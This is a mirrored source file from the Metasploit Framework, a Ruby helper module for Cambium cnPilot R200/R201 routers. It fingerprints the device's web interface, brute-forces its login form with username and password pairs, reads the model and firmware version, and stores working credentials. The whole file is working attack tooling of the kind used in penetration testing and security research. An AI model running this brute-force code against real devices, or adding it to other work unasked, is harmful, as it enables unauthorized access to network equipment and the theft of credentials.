CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/lib/msf/core/auxiliary/cnpilot.rb
Views: 11784
1
# -*- coding: binary -*-

2
module Msf

3
###

4
#

5
# This module provides methods for working with cnPilot R200/201

6
#

7
###

8


9
module Auxiliary::CNPILOT

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Auxiliary::AuthBrute

12
  include Msf::Auxiliary::Report

13
  include Msf::Auxiliary::Scanner

14


15
  def report_cred(opts)

16
    service_data = {

17
      address: opts[:ip],

18
      port: opts[:port],

19
      service_name: opts[:service_name],

20
      protocol: 'tcp',

21
      workspace_id: myworkspace_id

22
    }

23


24
    credential_data = {

25
      origin_type: :service,

26
      module_fullname: fullname,

27
      username: opts[:user],

28
      private_data: opts[:password],

29
      private_type: :password

30
    }.merge(service_data)

31


32
    login_data = {

33
      last_attempted_at: Time.now,

34
      core: create_credential(credential_data),

35
      status: Metasploit::Model::Login::Status::SUCCESSFUL,

36
      proof: opts[:proof]

37
    }.merge(service_data)

38


39
    create_credential_login(login_data)

40
  end

41


42
  #

43
  # Check if App is Cambium cnPilot

44
  #

45


46
  def is_app_cnpilot?

47
    begin

48
      res = send_request_cgi(

49
        {

50
          'uri'       => '/index.asp',

51
          'method'    => 'GET'

52
        }

53
      )

54


55
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError

56
      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")

57
      return false

58
    end

59


60
    good_response = (

61
      res &&

62
      res.code == 200 &&

63
      res.headers['Server'] &&

64
      (res.headers['Server'].include?('GoAhead-Webs') && res.body.include?('cnPilot') && res.body.include?('style_CAMBIUM.css'))

65
    )

66


67
    if good_response

68
      print_good("#{rhost}:#{rport} - Cambium cnPilot confirmed...")

69
      run_login

70
      return true

71
    else

72
      print_error("#{rhost}:#{rport} - Target does not appear to be Cambium cnPilot r200/r201. Module will not continue.")

73
      return false

74
    end

75
  end

76


77
  #

78
  # Brute-force the login page

79
  #

80


81
  def do_login(user, pass)

82
    print_status("#{rhost}:#{rport} - Attempting to login...")

83


84
    res = send_request_cgi(

85
      {

86
        'uri' => '/goform/websLogin',

87
        'method' => 'POST',

88
        'headers' => {

89
          'Accept' => 'application/json, text/javascript, */*; q=0.01'

90
        },

91
        'vars_post' =>

92
          {

93
            'user_name' => user,

94
            'password' => pass

95
          }

96
      }

97
    )

98


99
    good_response = (

100
      res &&

101
      res.code == 302 &&

102
      res.headers.include?('Location') &&

103
      res.headers['Location'].include?('Status_Basic')

104
    )

105


106
    if good_response

107
      print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")

108


109
      # Extract device model

110
      the_cookie = res.get_cookies

111


112
      res = send_request_cgi(

113
        {

114
          'uri' => '/status/Status_Basic.asp',

115
          'method' => 'GET',

116
          'cookie' => the_cookie,

117
          'headers' => {

118
            'Accept' => 'application/json, text/javascript, */*; q=0.01'

119
          }

120
        }

121
      )

122


123
      good_response = (

124
        res &&

125
        res.code == 200 &&

126
        res.headers.include?('Server') &&

127
        (res.headers['Server'].include?('GoAhead-Webs') && res.body.include?('cnPilot') && res.body.include?('style_CAMBIUM.css'))

128
      )

129


130
      if good_response

131
        get_cnpilot_model = res.body.match(/device_name= (.*)/)

132
        get_cnpilot_version_html = Nokogiri::HTML(res.body)

133
        get_cnpilot_version = get_cnpilot_version_html.at_css('div#statusInfo').text

134
        cnpilot_version = "#{get_cnpilot_version}".match(/p;(.*?)[$<\/]/)[1]

135


136
        if !get_cnpilot_model.nil?

137
          cnpilot_model = "#{get_cnpilot_model}".match(/[$"](.*)[$"]/)[1]

138


139
          if !cnpilot_model.nil?

140
            print_status("Running cnPilot #{cnpilot_model} #{cnpilot_version}")

141
            report_cred(

142
              ip: rhost,

143
              port: rport,

144
              service_name: "Cambium #{cnpilot_model} #{cnpilot_version}",

145
              user: user,

146
              password: pass

147
            )

148
          else

149
            print_status("Running cnPilot #{cnpilot_version}")

150
            report_cred(

151
              ip: rhost,

152
              port: rport,

153
              service_name: 'Cambium cnPilot #{cnpilot_version}',

154
              user: user,

155
              password: pass

156
            )

157
          end

158
          return the_cookie, cnpilot_version

159
        end

160
      end

161
    else

162
      print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")

163
      the_cookie = 'skip'

164
      cnpilot_version = 'skip'

165
      return the_cookie, cnpilot_version

166
    end

167
  end

168
end

169
end

170


171